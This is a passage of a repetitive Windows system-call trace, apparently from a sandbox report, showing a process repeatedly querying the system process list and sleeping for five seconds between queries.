Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0150.371] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0150.371] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0150.371] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0150.374] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0150.374] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0150.384] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0150.384] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0150.385] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0150.385] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0150.385] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0150.387] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0150.388] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0150.404] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0150.404] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0150.405] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0150.405] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0150.405] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0150.407] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0150.408] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0150.415] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0150.416] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0150.416] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0150.416] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0150.417] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0150.419] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0150.419] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0150.432] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0150.432] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0150.433] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0150.433] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0150.433] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0150.436] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0150.437] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0150.447] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0150.447] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0150.447] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0150.448] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0150.448] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0150.450] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0150.450] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0150.462] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0150.463] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0150.463] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0150.463] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0150.464] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0150.466] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0150.466] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0150.479] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0150.479] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0150.479] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0150.480] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0150.480] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0150.482] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0150.482] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0150.494] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0150.494] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0150.494] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0150.495] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0150.495] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0150.497] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0150.497] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0150.509] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0150.509] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0150.510] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0150.510] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0150.510] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0150.512] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0150.513] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0150.525] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0150.525] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0150.525] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0150.526] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0150.526] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0150.528] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0150.528] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0150.540] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0150.541] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0150.541] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0150.541] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0150.541] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0150.544] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0150.544] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0150.556] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0150.556] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0150.557] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0150.557] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0150.557] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0150.559] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0150.563] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0150.571] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0150.572] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0150.572] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0150.572] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0150.573] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0150.575] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0150.575] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0150.588] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0150.588] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0150.588] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0150.589] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0150.589] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0150.591] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0150.591] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0150.603] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0150.603] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0150.604] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0150.604] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0150.604] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0150.606] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0150.607] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0150.618] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0150.619] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0150.619] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0150.620] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0150.620] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0150.623] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0150.624] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0150.634] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0150.634] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0150.635] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0150.635] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0150.635] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0150.637] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0150.637] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0150.650] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0150.650] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0150.650] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0150.651] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0150.651] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0150.652] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0150.653] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0150.665] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0150.665] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0150.666] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0150.666] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0150.666] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0150.668] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0150.669] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0150.681] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0150.681] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0150.681] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0150.682] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0150.682] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0150.684] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0150.685] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0150.697] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0150.698] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0150.698] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0150.699] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, 